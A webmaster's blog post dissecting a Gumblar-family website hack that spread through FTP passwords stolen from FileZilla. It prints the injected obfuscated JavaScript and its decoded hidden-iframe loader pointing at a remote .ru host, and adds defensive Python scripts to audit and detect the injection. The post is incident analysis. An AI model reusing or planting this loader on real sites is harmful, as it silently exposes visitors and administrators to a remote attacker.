
Anatomy of a web-site hack


I recently found myself with a huge amount of investigative work, trying to find out all I could about a customer's hacked web-site.

Of course, I didn't exclude myself as a possible cause of the problem. Neither did I exclude my client, her assistant, a rogue employee of the hosting service or a remote third party. In order to make sure that the site was safe, I simply had to investigate, as well as take all other necessary security measures.

It all began with a mail from the client, on 8th January, saying that the hosting service had 'detected unusual FTP activity' from a named FTP account and that they had deleted the account. I told the client that I had never heard of that account and that this was indeed suspicious, as the hosting service had suggested. The client replied "ok I am on it…", so I left it alone. I am, after all, as always, extremely busy. I just continued working on the site and my other work.

On 13th January, the client informed me that she had had a warning from the Avast anti-virus program that a trojan horse had been spotted, and that she was unable to log in to the administration interface of the site. So I took more stringent measures. I investigated the site and found that there had indeed been unauthorized changes to some files on the 8th. I told the client and took the site down immediately. My investigation began.

The trojan was in the Gumblar family and officially known as JS:Illredir-B [Trj]. It spreads as follows: an administrator of the site uses FTP to log into the site. The most common FTP client is FileZilla, and FileZilla stores the account details in a file called sitemanager.xml. It stores everything, including passwords, totally un-encrypted, in plain text.

This administrator then inadvertently clicks on something that pops up, without thinking clearly, and a trojan is installed on their machine. This trojan transmits the contents of sitemanager.xml to the hacker. The hacker then uses this information to log in to the site and upload a set of altered files.
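As an added example (my own code, not part of the original post), a small audit script that reads a FileZilla sitemanager.xml and lists which saved sites carry a stored password, i.e. exactly the entries a file-stealing trojan could lift and the ones whose passwords must be rotated. The XML sample is constructed here, and the element layout (FileZilla3/Servers/Server with Host, User, Pass) is assumed from the FileZilla versions I have seen, not taken from the post.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed sample in the layout FileZilla uses for sitemanager.xml (assumed layout,
# not copied from any real machine). One entry stores the password in plain text,
# one base64-encoded (newer FileZilla releases), one has no stored password at all.
SAMPLE_SITEMANAGER = """
<FileZilla3>
  <Servers>
    <Server>
      <Host>ftp.example.test</Host><Port>21</Port><Protocol>0</Protocol>
      <User>siteadmin</User><Pass>sample-plaintext-pw</Pass><Name>client site</Name>
    </Server>
    <Server>
      <Host>ftp.shop.example.test</Host><Port>21</Port><Protocol>0</Protocol>
      <User>shopadmin</User><Pass encoding="base64">c2VjcmV0</Pass><Name>shop</Name>
    </Server>
    <Server>
      <Host>sftp.example.test</Host><Port>22</Port><Protocol>1</Protocol>
      <User>deploy</User><Name>sftp, password not saved</Name>
    </Server>
  </Servers>
</FileZilla3>
"""


def stored_credentials(xml_text: str) -> list:
    """Return (name, host, user, password_stored) for every saved site.

    A base64 <Pass> is decoded only to show it is trivially recoverable by
    anything that can read the file; the secret itself is never returned.
    """
    root = ET.fromstring(xml_text)
    rows = []
    for srv in root.iter('Server'):
        pass_el = srv.find('Pass')
        stored = False
        if pass_el is not None and pass_el.text:
            if pass_el.get('encoding') == 'base64':
                base64.b64decode(pass_el.text)  # raises if the value is not base64
            stored = True
        rows.append((srv.findtext('Name'), srv.findtext('Host'),
                     srv.findtext('User'), stored))
    return rows


def sites_to_rotate(xml_text: str) -> list:
    """Hosts whose FTP password lives in the file: rotate them and purge the entry."""
    return [host for _, host, _, stored in stored_credentials(xml_text) if stored]
```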

The affected files are those with the .js (JavaScript) extension and those named Default.php and Index.html. It may also affect files with 'main', 'header' or 'footer' in their names. Many of these contain rogue code in an obfuscated format. It looks like garbage, but is in fact PHP code that resolves the garbage into JavaScript. The script forces all administration pages to open a hidden iframe (a web-page within a web-page). The iframe's URL is a remote PHP script that presumably does something with the site, such as transmitting customer details, user login details etc.

When I got round to examining the remote script page the following day, it was empty, so either the hacker had disabled the script when he realized that the scam had been exposed, or it was never implemented in the first place.

I was able to restore all affected files from a back-up I had made 2 days before the hack, so cleaning the site was not so difficult. Tracing the source of the infection was another issue.

It was then that I noticed that the support person at the hosting service was called 'jim' (name changed to protect this individual's privacy) and that the suspicious FTP activity came from an account called 'jimtest'. That was the clue I needed. The support person had once created this account to test the installation. He neither deleted the account nor removed it from his FTP client's configuration. When he got the trojan, on 8th January, the hacker was able to get the login details (probably for a lot of other sites as well) and do the dirty deed. This was quickly noticed by the hosting service, who took the action described above.

This is seriously unprofessional behavior, and I find it equally unprofessional of the hosting service not to tell the truth about this or provide details. In fact, they will not give me any details, even of the hacked account which they deleted, so I can never get to the truth. The above scenario is the only one I can come up with that fits all the known facts, but I have no evidence, because the hosting service is being so secretive (covering their tracks).

The net result is that I had hours of unnecessary work, the customer had lots of time and money wasted and the site had to be down for 2 days.

I have advised the customer to migrate to a different service.

Here are some details of the hack, for your information:

The script looks like this:

This resolves to:

On the page, this then becomes:

Mowkyfdh = 'e^&l)a^#&n@))@c@#)e@$(-##c&^o$$(!m^#@##.#))b^$#l#)$o#)#g!@$g&))e^r^.#)&#c@&@o&)m#.()$s@e#&$n)$@d)$s$(p!!a)&(c&@$)e&(-$#c#(o#!@m@!.&)&$t&#e))e!$^@(n^)w@e!@b^(d(#!e##^)s)#i$$!g(@(n&)(.#@^r)@&u((!'.replace(/\^|&|\)|#|\!|@|\(|\$/ig, '');


That runs a remote script that resolves to:

f = document.createElement('iframe');
f.src = 'http://'+Mowkyfdh+':8080/index.php?ys';
f.style.visibility = 'h)!$i^!d#@d!e!n)($@'.replace(/&|\$|\^|#|@|\)|\!|\(/ig, '');
document.body.appendChild(f);

This creates a hidden iframe with the URL 'http://elance-com.blogger.com.sendspace-com.teenwebdesign.ru:8080/index.php?ys'.
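To find and decode this kind of injection on a copy of the site files, here is an added example (my own code, not from the post or from any removal script it links to): it locates the '<junk>'.replace(/…/ig, '') construct, applies the same character removal the browser would apply, and reports the iframe target so the affected files can be identified and restored. The sample input embeds the two fragments quoted above and is otherwise constructed.

```python
import re

# Constructed sample: the two obfuscated fragments quoted in the post, laid out as
# they would sit in an injected .js file (not a copy of any real infected file).
SAMPLE_JS = r"""
Mowkyfdh = 'e^&l)a^#&n@))@c@#)e@$(-##c&^o$$(!m^#@##.#))b^$#l#)$o#)#g!@$g&))e^r^.#)&#c@&@o&)m#.()$s@e#&$n)$@d)$s$(p!!a)&(c&@$)e&(-$#c#(o#!@m@!.&)&$t&#e))e!$^@(n^)w@e!@b^(d(#!e##^)s)#i$$!g(@(n&)(.#@^r)@&u((!'.replace(/\^|&|\)|#|\!|@|\(|\$/ig, '');
f = document.createElement('iframe');
f.src = 'http://'+Mowkyfdh+':8080/index.php?ys';
f.style.visibility = 'h)!$i^!d#@d!e!n)($@'.replace(/&|\$|\^|#|@|\)|\!|\(/ig, '');
document.body.appendChild(f);
"""

# Matches  '<junk>'.replace(/<alternation of junk characters>/<flags>, '')
OBF_RE = re.compile(r"'([^']*)'\.replace\(/((?:\\.|[^/\\])+)/([a-z]*)\s*,\s*''\)")


def decode_obfuscated(js: str) -> list:
    """Return the strings the injected code would produce at run time."""
    out = []
    for junk, pattern, flags in OBF_RE.findall(js):
        # The JS alternation of escaped single characters is valid Python regex too.
        py_flags = re.IGNORECASE if 'i' in flags else 0
        out.append(re.sub(pattern, '', junk, flags=py_flags))
    return out


def find_hidden_iframe_injection(js: str):
    """Return (domain, port) if the file carries this family's hidden-iframe loader, else None."""
    decoded = decode_obfuscated(js)
    has_iframe = re.search(r"createElement\(\s*'iframe'\s*\)", js) is not None
    if not (has_iframe and 'hidden' in decoded):
        return None
    port = re.search(r"':(\d+)/", js)           # the ':8080/index.php?ys' fragment
    domain = next((s for s in decoded if s != 'hidden'), None)
    return domain, (int(port.group(1)) if port else None)
```

Run it over every .js, Default.php and Index.html in the web root; any file that returns a non-None result should be replaced from a pre-incident backup rather than edited in place.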

Whois details for this domain:

domain: TEENWEBDESIGN.RU
type: CORPORATE
nserver: ns1.hostserverdirect.com.
nserver: ns2.hostserverdirect.com.
nserver: ns3.hostserverdirect.com.
nserver: ns4.hostserverdirect.com.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
phone: +7 4912 219900
e-mail: dibs@freemailbox.ru
registrar: NAUNET-REG-RIPN
created: 2009.10.28
paid-till: 2010.10.28
source: TCI

The phone number is in Kazakhstan.

I hope that this blog entry may help other web-site owners and webmasters to more easily and quickly detect this particular scam and deal with it appropriately.

I thank the following web-sites for information that helped me to get to the bottom of this story:

Zyenweb.com

JustCoded.com This site provides a removal script, but I preferred to do the clean-up manually, even though it took a long time.

Avast forum




17 comments to Anatomy of a web-site hack

  • fantastic issues altogether, you just won a new reader.
    What might you suggest about your put up that you just made a
    few days in the past? Any positive?

  • I believe that is one of the so much vital info for me. And i’m happy studying your article. However should observation on few basic issues, The site style is ideal, the articles is truly excellent : D. Good job, cheers

  • I’m not sure why but this website is loading extremely slow for me. Is anyone else having this issue or is it a problem on my end? I’ll check back later and see if the problem still exists.

  • I was suggested this website by my cousin. I am not sure whether this post is written by him as no one else know such detailed about my difficulty. You are wonderful! Thanks!

  • Simply desire to say your article is as astounding. The clarity in your post is just excellent and I could assume you are an expert on this subject. Well with your permission let me to grab your feed to keep up to date with forthcoming post. Thanks a million and please keep up the gratifying work.

  • I am indeed thankful to you for providing us with this invaluable advice. My spouse and I are actually grateful, specifically the data we needed.

  • Thanks for the well-described article!
    My site was attacked in a similar way, via the trojan JS:Illredir-CI [Trj]. Avast! only recognised it at the beginning of July and added it to its database. In short, the solution is 1) to change the FTP password, 2) to overwrite all JavaScript files from a backup, 3) to check all index files and replace them where necessary. At the bottom of the files there is a java string to delete. This work should be done on the server, since the infected files cannot be downloaded and opened.
    I wrote a couple of things about it on my site.
    The worst thing about the attack is that as soon as you connect via FTP, the virus infects all the domains for which the FTP program has saved passwords. I was using FileZilla.
    http://www.quattrossa.com/news-novita-sito-web/dettagli-news/la-soluzione-al-virus-trojan-jsillredir-ci-trj/93ad19747a6acedd53d2ed8193971a7d/

    Regards
    Antonio

  • Excellent content. Thanks for posting.

  • Nice going. Website security is becoming a HUGE issue nowadays, for both static html/css and WordPress blogs. I’ve seen a lot of the IFRAME malware type stuff, and even got hit with it a few times.

    Continued success to you. Great blog!

  • I had read this whole article and it is really superb. Great article I must say. Well as we know today safety must be very important. I think it is very important to understand all things. Superb website and is has been very informative for me.

  • Hey, I think your site is very informative. I found it via Bing. Will definitely come back soon

  • howdy there, i just saw your website listed on google, and i must tell that you express exceptionally well on your website. i am truly struck by the mode that you write, and the subject is outstanding. in any event, i would also like to know whether you would like to exchange links with my web portal? i will be to the great extent than willing to reciprocate and insert your link on in the link exchange area. looking for your answer, thanks and enjoy your day!

    • Ray

      Thanks a lot for your kind comments on my blog entry. It really gives me encouragement to write new entries. Reading such comments is about the only reward I get for doing this, which I do, not for any remuneration, but because I believe in sharing knowledge and building the net by contribution.

      Although my experiences with the company ‘Panda Security’, in the long ago past, have not been positive, mostly on the grounds of low standards in marketing ethics, I concede that companies change over the years, so such ancient experiences are not necessarily a good guideline.

      I proceeded to your website 'Cyber Circles' to check on your credentials. At first, I avoided the commercial material and checked your 'Privacy' page. It looked good – simple and clear. Your 'About Us and Contact Us' link led to a short paragraph that explained that you are a portal dealing with Panda, which is kind of obvious, anyway. Otherwise you give your basic contact details. However, I could not figure out, from this, what exactly is your connection with 'Panda Security'. I can only assume you are either an in-house branch of that company or an outsourced arm, on their payroll. Although this is not entirely clear, I presume that you are not an altruistic lover of Panda products, just doing his bit to share the knowledge. Is this correct?

      Then I went to the 'Links Center' page (which I presume is what you call, in your comment, the 'link exchange area'). This is, after all, what this investigation was all about, in the first place. Although all the commercial material worked normally, the links to 'Panda Security' software sales included tedious re-directions and 3 cookies. In the end, I arrived at the Panda Security shop.

      Imagine my surprise to find that none of the actual content links – the Link categories, themselves – worked at all. They all led to a 404 error (Page not found)!
      e.g.

      404: Not Found

      Sorry, but the content you requested could not be found

      FILE NOT FOUND: Computers_and_Internet/
      URI:/Computers_and_Internet/

      This is not a good advertisement for your company or PHPLinkDirectory, the system that you seem to be using on your site. I went to their site and found that on their Features page, a number of the listed features had no links. The ones that did, linked back to the Features page, so went nowhere – and this is a company that deals with linking!!!!

      This begs a few questions.

      In the first place, why was this not checked, before launching the site and regularly afterwards? It should at least have been checked, before you placed that comment on my site.

      Secondly, Are you aware of this unacceptable part of your web developer’s delivery of service?

      Thirdly, why would you expect me to share a link with a site that is broken, unclear about its role and wholly promotional of a single company's products?

      Finally, was it clear enough that, given the nature of my knowledge and experience, I always check and report on all this sort of information, before agreeing to share anything with any web-site? Am I being transparent enough about my intention to share any such report with my readers, in this blog?

      Naturally, you have the right to answer this comment with one of your own, rebutting any opinion that I have expressed and/or explain where I am wrong in holding this opinion.

  • Damn, awesome website. I actually came across this on Bing, and I am happy I did. I will definitely be returning here more often. Wish I could add to the posts here and bring a bit more to the table, but am just absorbing as much info as I can at the moment.

    Thank You

    Mobile Phones Deals

  • Björn

    Thanks so much for this, I also had this problem and never realised that I needed to change the FTP password 😮
